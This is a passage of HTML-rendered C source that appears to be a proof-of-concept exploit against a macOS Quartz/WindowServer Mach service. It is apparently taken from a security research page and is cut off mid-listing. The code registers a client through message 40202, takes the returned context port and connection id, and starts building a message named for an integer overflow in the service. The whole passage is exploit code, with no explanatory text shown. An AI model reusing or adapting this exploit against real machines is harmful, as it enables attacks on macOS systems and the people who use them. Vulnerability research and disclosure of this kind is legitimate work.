id=\"crayon-5c045a5ab3043485934892-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KERN_SUCCESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] Cannot get service of %s, %s!n&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">render_service_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_error_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_register_client_s <\/span><span class=\"crayon-v\">quartz_register_client_t<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_register_client_s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_msg_header_t <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_msg_port_descriptor_t <\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-45\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">padding<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">12<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">quartz_register_client_t <\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-49\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_bits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">MACH_MSGH_BITS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_MAKE_SEND_ONCE<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">MACH_MSGH_BITS_COMPLEX<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_remote_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_local_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mig_get_reply_port<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">40202<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ _XRegisterClient<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-58\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-59\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-60\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-61\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-62\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-63\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-64\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-65\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-66\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-67\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_task_self<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-68\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">disposition<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-69\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">ports<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_PORT_DESCRIPTOR<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-70\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-71\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_SEND_MSG<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_RCV_MSG<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-72\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">quartz_register_client_t<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">quartz_register_client_t<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-73\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_local_port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSG_TIMEOUT_NONE<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_PORT_NULL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-74\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">KERN_SUCCESS<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-75\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">printf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;[-] Send message failed: %sn&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mach_error_string<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">kr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-76\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-77\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-78\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-79\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_port_t <\/span><span class=\"crayon-v\">context_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-80\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">conn_id<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint32_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">uint8_t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg_register<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x30<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-81\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-82\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-r\">typedef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_function_int_overflow_s <\/span><span class=\"crayon-v\">quartz_function_int_overflow_t<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-83\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">quartz_function_int_overflow_s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-84\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">mach_msg_header_t <\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-85\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msg_body<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0x60<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-86\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-87\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-88\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">quartz_function_int_overflow_t <\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-89\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_bits<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5c045a5ab3043485934892-90\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">MACH_MSGH_BITS<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">MACH_MSG_TYPE_COPY_SEND<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">MACH_MSGH_BITS_COMPLEX<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5c045a5ab3043485934892-91\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">function_int_overflow_msg<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">header<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">msgh_remote_port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">context_port<\/span><span 